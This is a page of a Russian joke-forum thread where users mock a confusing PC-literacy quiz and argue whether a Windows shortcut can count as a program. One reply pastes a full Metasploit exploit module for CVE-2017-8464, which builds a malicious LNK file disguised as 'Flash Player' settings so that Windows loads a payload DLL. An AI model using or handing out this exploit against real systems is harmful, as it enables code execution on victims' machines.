Проверьте свое знание ПК

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (7) « Первая ... 4 5 [6] 7   К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
exoricst
25.11.2017 - 14:10
0
Статус: Offline


Ярила

Регистрация: 4.06.15
Сообщений: 7940
Хорошие вопросы с подкавыркой. Некоторые заставляют пораскинуть мозгами.

Для примера 2. Какой ярлык является программой?

Если ярлык это ссылка на программу. То ярлык в котором записаны команды, будет ли программой? При том что некоторые программы, без такого ярлыка с командами и нужными данными, просто не запустятся?
 
[^]
Rodmann
25.11.2017 - 14:12
1
Статус: Offline


Ярила

Регистрация: 12.09.12
Сообщений: 2678
у меня дочь в 6ом классе
регулярно с такими задачами приходит
это информатика :):):
подмосковье
обещают в след году начать учить программирование
надеюсь не бейсик, хотя бы паскаль :)
 
[^]
T4NZWUT
25.11.2017 - 14:13
3
Статус: Offline


Приколист

Регистрация: 22.11.10
Сообщений: 345
Я чисто интуитивно попытаюсь ответить на это задание, может мне повезёт? sm_biggrin.gif
П1:
1) Ярлык для ***.lnk
2) Сcылающийся на exe файл
3) Если использовать | вместо L
4) Оболочка
5) System Volume Information, при условии - нет прав SYSTEM на запись.
6) учитывая win95 может, но медленно
7) HIMEM.SYS
8) Ниодной т.е. не являются OS.

П2:
1) В блокногте, если рисунок в ACSII.
2) 1 - расширение JPEG, 2 - объём GIF (без мультипликации).
3) К примеру если используются системой типа - pagefile.sys, hiberfil.sys.. либо при повреждении записи на ФС и выводом в UTF-16. (только форматирование).
4) cmd->mkdir COM1
5) В той, куда всё скопировали.

П3:
1) Антивирусы уже содержат ф-ию распаковки архивов.
2) Антивирус
3) Да по каченуууууу... Лайлалай...(ц) Красная Плесень =\
4) Принтер, если он сетевой с ф-ией WI-FI точки доступа (ну, а потом из розетки).
5.1) фотошоп - есть возможность сохранить PDF с форматированием текста.
5.2) Выделенный.



На Ваш суд, отвечал пытаясь приблизить к реальности, сколько балов я набрал? pray.gif Может у кого есть другие варианты? gigi.gif
 
[^]
Vivivdarium
25.11.2017 - 14:13
0
Статус: Offline


Ярила

Регистрация: 1.05.16
Сообщений: 7890
Заебись. Дайте телефон диллера.



Отправлено с мобильного клиента YAPik+

Проверьте свое знание ПК
 
[^]
krendel13
25.11.2017 - 14:13
2
Статус: Offline


Хохмач

Регистрация: 13.12.16
Сообщений: 703
Цитата
Если ярлык это ссылка на программу. То ярлык в котором записаны команды, будет ли программой? При том что некоторые программы, без такого ярлыка с командами и нужными данными, просто не запустятся?

Всё что написано в коде понятном процессору является компьютерной программой, ярлык исключением не является.
 
[^]
Vivivdarium
25.11.2017 - 14:14
0
Статус: Offline


Ярила

Регистрация: 1.05.16
Сообщений: 7890
Автор сего пиздахуительного опросника походу кумыс на мухоморах настаивает.




Отправлено с мобильного клиента YAPik+

Проверьте свое знание ПК
 
[^]
krendel13
25.11.2017 - 14:17
0
Статус: Offline


Хохмач

Регистрация: 13.12.16
Сообщений: 703
Цитата (Vivivdarium @ 25.11.2017 - 14:13)
Заебись. Дайте телефон диллера.



Отправлено с мобильного клиента YAPik+

Узнаешь кинь мне в личку. Хотя... Надо на сайт министерства образования зайти, глянуть телефон отдела распространения. Там точно такое курят. cool.gif

Это сообщение отредактировал krendel13 - 25.11.2017 - 14:19
 
[^]
wolferus
25.11.2017 - 14:37
1
Статус: Online


Ярила

Регистрация: 26.05.15
Сообщений: 1803
20 лет айтишником работаю...
у меня на каждый вопрос свой вопрос. Я еврей?
 
[^]
RAMI
25.11.2017 - 14:43
0
Статус: Offline


Ярила

Регистрация: 2.08.10
Сообщений: 2773
Это тест наоборот ебта... Инверстест :)
 
[^]
Deskjet
25.11.2017 - 14:47
2
Статус: Offline


Балагур

Регистрация: 25.05.16
Сообщений: 856
Это не тест, это бред...особенно про драйвер памяти позабавило...
 
[^]
OTMOPO3OK
25.11.2017 - 14:52
2
Статус: Offline


Ветеран Япа

Регистрация: 11.10.04
Сообщений: 20975
Цитата (pykki @ 24.11.2017 - 16:17)
А ну-ка, узнайте уровень своей компьютерной грамотности gigi.gif

Вспомнил как проги в верхнюю память загружал :)

HIMEM.SYS
 
[^]
OTMOPO3OK
25.11.2017 - 14:53
4
Статус: Offline


Ветеран Япа

Регистрация: 11.10.04
Сообщений: 20975
Цитата (Deskjet @ 25.11.2017 - 12:47)
Это не тест, это бред...особенно про драйвер памяти позабавило...

почему бред?

HIMEM.SYS — драйвер дополнительной (extended memory) и HMA-памяти для операционной системы MS-DOS, обеспечивающий поддержку дополнительной памяти (extended или expanded).

HIMEM.SYS был введён в состав MS-DOS 5.0 для возможности загрузки ядра операционной системы DOS в High Memory Area с целью увеличения размера доступной основной области памяти путём указания загрузки DOS=HIGH в CONFIG.SYS.

HIMEM.SYS предоставляет доступ к оперативной памяти за пределами первого мегабайта пространства и потому драйвер необходим системам MS Windows9x/ME для загрузки графической части операционных систем. В FreeDOS соответствующий файл называется HIMEM.EXE и может загружаться из конфигурационных файлов FreeDOS с именами FDCONFIG.SYS или CONFIG.SYS.
 
[^]
mimimimimimi
25.11.2017 - 15:31
-1
Статус: Offline


Весельчак

Регистрация: 26.03.16
Сообщений: 100
Цитата (foxschadows @ 25.11.2017 - 10:31)
Автор вопросов

А че не так-то? Я бы в прямом эфире на вопрос "что такое айпиадрес"? завис бы секунд на тридцать. Интервьюер - долбоеб. Ище бы спросил, почему солнце желтое.

Это сообщение отредактировал mimimimimimi - 25.11.2017 - 15:37
 
[^]
breid
25.11.2017 - 15:34
2
Статус: Offline


ищу вам хуенота

Регистрация: 13.11.10
Сообщений: 3977
хуй знает. на ярлыке ни разу не программировал. по моему это для монгольских программистов.
 
[^]
mimimimimimi
25.11.2017 - 15:50
1
Статус: Offline


Весельчак

Регистрация: 26.03.16
Сообщений: 100
Цитата (breid @ 25.11.2017 - 15:34)
хуй знает. на ярлыке ни разу не программировал. по моему это для монгольских программистов.

Вот тебе программа на ярлыке:
C:\Windows\System32\cmd.exe /c echo hello
 
[^]
mblshkoblud
25.11.2017 - 15:58
1
Статус: Offline


Ярила

Регистрация: 16.12.15
Сообщений: 3891
Эти вопросы напомнили один кроссворд:

По горизонтали:
1. Незаметно склеенная посуда. 6. Сюрприз, известный заранее. 7. Человек, опоздавший на поезд или самолет. 9. Старое насекомое. 11. Минута, оставшаяся до встречи. 12. Квартира с большим количеством мебели. 13 Неуслышанный будильник. 20. Разросшаяся крапива. 21. Выросшие ноги. 22. Вовремя спрятанный предмет. 23. Незнакомое слово. 24. Стул, крутящийся только по часовой стрелке. 26. Двести грамм сыра. 30. Неприятная телепередача. 31. Мерный, повторяющийся звук. 32. Платье подруги. 33. Минимальный суверенитет. 34. Забытый в холодильнике продукт. 35. Любимая работа, выполняемая каждый день.

По вертикали:

2. Действие, стимулирующее принятие решения. 3. Стертые обои. 4. Легкое нарушение в дорожном движении. 5. Мнение со стороны. 8. Чувство социального неравенства. 10. Чистая, но непрозрачная вода. 14. Одетый наизнанку свитер. 15. Научное открытие без эмоциональной окраски. 16. Тупая сторона ножа. 17. Следы от чернил в кармане. 18. Пыль в недоступных местах. 19. Старое одеяло. 25. Пустая катушка. 27. Хорошая привычка. 28. Опыт в стихосложении. 29. Абсолютная материальная ценность.

Проверьте свое знание ПК
 
[^]
T4NZWUT
25.11.2017 - 16:07
1
Статус: Offline


Приколист

Регистрация: 22.11.10
Сообщений: 345
Цитата (mimimimimimi @ 25.11.2017 - 15:50)
Цитата (breid @ 25.11.2017 - 15:34)
хуй знает. на ярлыке ни разу не программировал. по моему это для монгольских программистов.

Вот тебе программа на ярлыке:
C:\Windows\System32\cmd.exe /c echo hello

Разочарую, он из албанских gigi.gif
 
[^]
mks
25.11.2017 - 16:07
1
Статус: Offline


Ярила

Регистрация: 12.02.09
Сообщений: 2955
Цитата (exoricst @ 25.11.2017 - 14:10)
Хорошие вопросы с подкавыркой. Некоторые заставляют пораскинуть мозгами.

Для примера 2. Какой ярлык является программой?

Если ярлык это ссылка на программу. То ярлык в котором записаны команды, будет ли программой? При том что некоторые программы, без такого ярлыка с командами и нужными данными, просто не запустятся?

Может ли быть ярлык с командами программой, вот что за бред ты несешь, ярлык как ты уже сказал всего лишь ссылка на программу, параметры, которые ты можешь задать после ссылки, при необходимости могут считываться запускаемой программой как входящие данные, но ярлык из-за этого не станет программой! dont.gif
 
[^]
mimimimimimi
25.11.2017 - 16:14
0
Статус: Offline


Весельчак

Регистрация: 26.03.16
Сообщений: 100
Цитата (mks @ 25.11.2017 - 16:07)
Цитата (exoricst @ 25.11.2017 - 14:10)
Хорошие вопросы с подкавыркой. Некоторые заставляют пораскинуть мозгами.

Для примера 2. Какой ярлык является программой?

Если ярлык это ссылка на программу. То ярлык в котором записаны команды, будет ли программой? При том что некоторые программы, без такого ярлыка с командами и нужными данными, просто не запустятся?

Может ли быть ярлык с командами программой, вот что за бред ты несешь, ярлык как ты уже сказал всего лишь ссылка на программу, параметры, которые ты можешь задать после ссылки, при необходимости могут считываться запускаемой программой как входящие данные, но ярлык из-за этого не станет программой! dont.gif

Остынь, чувак. Этот опрос - фейк и его никто не принимает всерьез. Правда ведь?
 
[^]
T4NZWUT
25.11.2017 - 16:28
2
Статус: Offline


Приколист

Регистрация: 22.11.10
Сообщений: 345
Цитата (mks @ 25.11.2017 - 16:07)
Цитата (exoricst @ 25.11.2017 - 14:10)
Хорошие вопросы с подкавыркой. Некоторые заставляют пораскинуть мозгами.

Для примера 2. Какой ярлык является программой?

Если ярлык это ссылка на программу. То ярлык в котором записаны команды, будет ли программой? При том что некоторые программы, без такого ярлыка с командами и нужными данными, просто не запустятся?

Может ли быть ярлык с командами программой, вот что за бред ты несешь, ярлык как ты уже сказал всего лишь ссылка на программу, параметры, которые ты можешь задать после ссылки, при необходимости могут считываться запускаемой программой как входящие данные, но ярлык из-за этого не станет программой! dont.gif

http://0day.today/exploit/description/28973
А так с уязвимостью MS Windows?
Microsoft Windows LNK File Code Execution Exploit, я просто оставлю это тут, метасплойт, есть баги, где достаточно фильм скачать с библиотекой и запустить, сразу же будет запущенна библиотека из папки с фильмом, это касается WinXP, библиотека можеть быть вовсе не нужна, кодек с трояном сам загрузится, т.к. он не будет первоначально искаться в system32.




Код
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
 Rank = ExcellentRanking

 include Msf::Exploit::EXE
 include Msf::Exploit::FileDropper
 include Msf::Post::File
 include Msf::Post::Windows::Priv

 attr_accessor :exploit_dll_name

 def initialize(info = {})
   super(
     update_info(
       info,
       'Name'            => 'LNK Code Execution Vulnerability',
       'Description'     => %q{
         This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
         that contain a dynamic icon, loaded from a malicious DLL.

         This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
         similar except an additional SpecialFolderDataBlock is included. The folder ID set
         in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
         the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
         DLL file.

         The PATH option must be an absolute path to a writeable directory which is indexed for
         searching. If no PATH is specified, the module defaults to %USERPROFILE%.
       },
       'Author'          =>
         [
           'Uncredited',      # vulnerability discovery
           'Yorick Koster',   # msf module
           'Spencer McIntyre' # msf module
         ],
       'License'         => MSF_LICENSE,
       'References'      =>
         [
           ['CVE', '2017-8464'],
           ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
           ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup
           ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format
           ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],
           ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']
         ],
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => 'process',
           'FileDropperDelay' => 15,
           'WfsDelay'         => 30
         },
       'Arch'            => [ARCH_X86, ARCH_X64],
       'Payload'         =>
         {
           'Space'       => 2048
         },
       'Platform'        => 'win',
       'Targets'         =>
         [
           [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
           [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
         ],
       'DefaultTarget'   => 0, # Default target is Automatic
       'DisclosureDate'  => 'Jun 13 2017'
     )
   )

   register_options(
     [
       OptString.new('FILENAME', [false, 'The LNK file']),
       OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
       OptString.new('PATH', [false, 'An explicit path to where the files should be written to'])
     ]
   )

   register_advanced_options(
     [
       OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
       OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
     ]
   )
 end

 def check
   if session.sys.process['SearchIndexer.exe']
     return Exploit::CheckCode::Detected
   end

   Exploit::CheckCode::Safe
 end

 def get_name(option, default_ext)
   name = datastore[option].to_s.strip
   name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank?
   name
 end

 def exploit
   if is_system?
     fail_with(Failure::None, 'Session is already elevated')
   end

   if session.platform != 'windows'
     fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
   end

   if check == Exploit::CheckCode::Safe
     fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
   end

   if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
     fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
   elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
     fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
   end

   path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
   arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
   datastore['EXE::Path'] = path
   datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")

   path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%")
   path.chomp!("\\")

   dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}"
   write_file(dll_path, generate_payload_dll)

   lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}"
   write_file(lnk_path, generate_link(dll_path))
   register_files_for_cleanup(dll_path, lnk_path)
 end

 def file_rm(file)
   if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true)
     @dropped_files.delete(file)
   end
 end

 def generate_link(path)
   vprint_status("Generating LNK file to load: #{path}")
   path += "\x00" # Do not use << here
   display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
   comment = datastore['LnkComment'].dup << "\x00"

   # Control Panel Applet ItemID with our DLL
   cpl_applet = [
     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
     0x00, 0x00
   ].pack('C*')
   cpl_applet << [path.length].pack('v')
   cpl_applet << [display_name.length].pack('v')
   cpl_applet << path.unpack('C*').pack('v*')
   cpl_applet << display_name.unpack('C*').pack('v*')
   cpl_applet << comment.unpack('C*').pack('v*')

   # LinkHeader
   ret = [
     0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
     0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
     0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
     0x00, 0x00, 0x00, 0x00, # FileAttributes
     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
     0x00, 0x00, 0x00, 0x00, # FileSize
     0x00, 0x00, 0x00, 0x00, # IconIndex
     0x00, 0x00, 0x00, 0x00, # ShowCommand
     0x00, 0x00, # HotKey
     0x00, 0x00, # Reserved1
     0x00, 0x00, 0x00, 0x00, # Reserved2
     0x00, 0x00, 0x00, 0x00  # Reserved3
   ].pack('C*')

   # IDList
   idlist_data = ''
   # ItemID = ItemIDSize (2 bytes) + Data (variable)
   idlist_data << [0x12 + 2].pack('v')
   idlist_data << [
     # All Control Panel Items
     0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
     0x30, 0x9d
   ].pack('C*')
   # ItemID = ItemIDSize (2 bytes) + Data (variable)
   idlist_data << [cpl_applet.length + 2].pack('v')
   idlist_data << cpl_applet
   idlist_data << [0x00].pack('v') # TerminalID

   # LinkTargetIDList
   ret << [idlist_data.length].pack('v') # IDListSize
   ret << idlist_data

   # ExtraData
   # SpecialFolderDataBlock
   ret << [
     0x10, 0x00, 0x00, 0x00, # BlockSize
     0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
     0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
     0x14, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
   ].pack('C*')
   # TerminalBlock
   ret << [0x00, 0x00, 0x00, 0x00].pack('V')
   ret
 end
end

#  0day.today [2017-11-25]  #


Это сообщение отредактировал T4NZWUT - 25.11.2017 - 16:49
 
[^]
savior1975
25.11.2017 - 17:16
2
Статус: Offline


Шутник

Регистрация: 27.07.14
Сообщений: 12
Цитата (pykki @ 24.11.2017 - 18:17)
А ну-ка, узнайте уровень своей компьютерной грамотности gigi.gif

Че за бред????????????????
 
[^]
WarMAN68
25.11.2017 - 17:23
2
Статус: Offline


Шутник

Регистрация: 31.12.09
Сообщений: 95
Цитата (savior1975 @ 25.11.2017 - 17:16)
Цитата (pykki @ 24.11.2017 - 18:17)
А ну-ка, узнайте уровень своей компьютерной грамотности  gigi.gif

Че за бред????????????????

Технически, практически любой вопрос имеет какой-либо ответ. Вопросы интересные. Ответы, однозначно, есть!
 
[^]
zengarden
25.11.2017 - 17:51
0
Статус: Offline


Юморист

Регистрация: 14.10.16
Сообщений: 423
— хакеры, крекеры, куки, троянские кони… вы записываете?
 
[^]
allod
25.11.2017 - 18:39
0
Статус: Offline


Ярила

Регистрация: 9.05.14
Сообщений: 3301
что блядь это за хуита?!?!?!
 
[^]
ГражданинЧе
25.11.2017 - 19:01
0
Статус: Offline


Ярила

Регистрация: 17.06.14
Сообщений: 16356
Это были 90-е. Мы проходили компьютерные курсы как могли lamo.gif
 
[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 35891
0 Пользователей:
Страницы: (7) « Первая ... 4 5 [6] 7  [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]


 
 



Активные темы






Наверх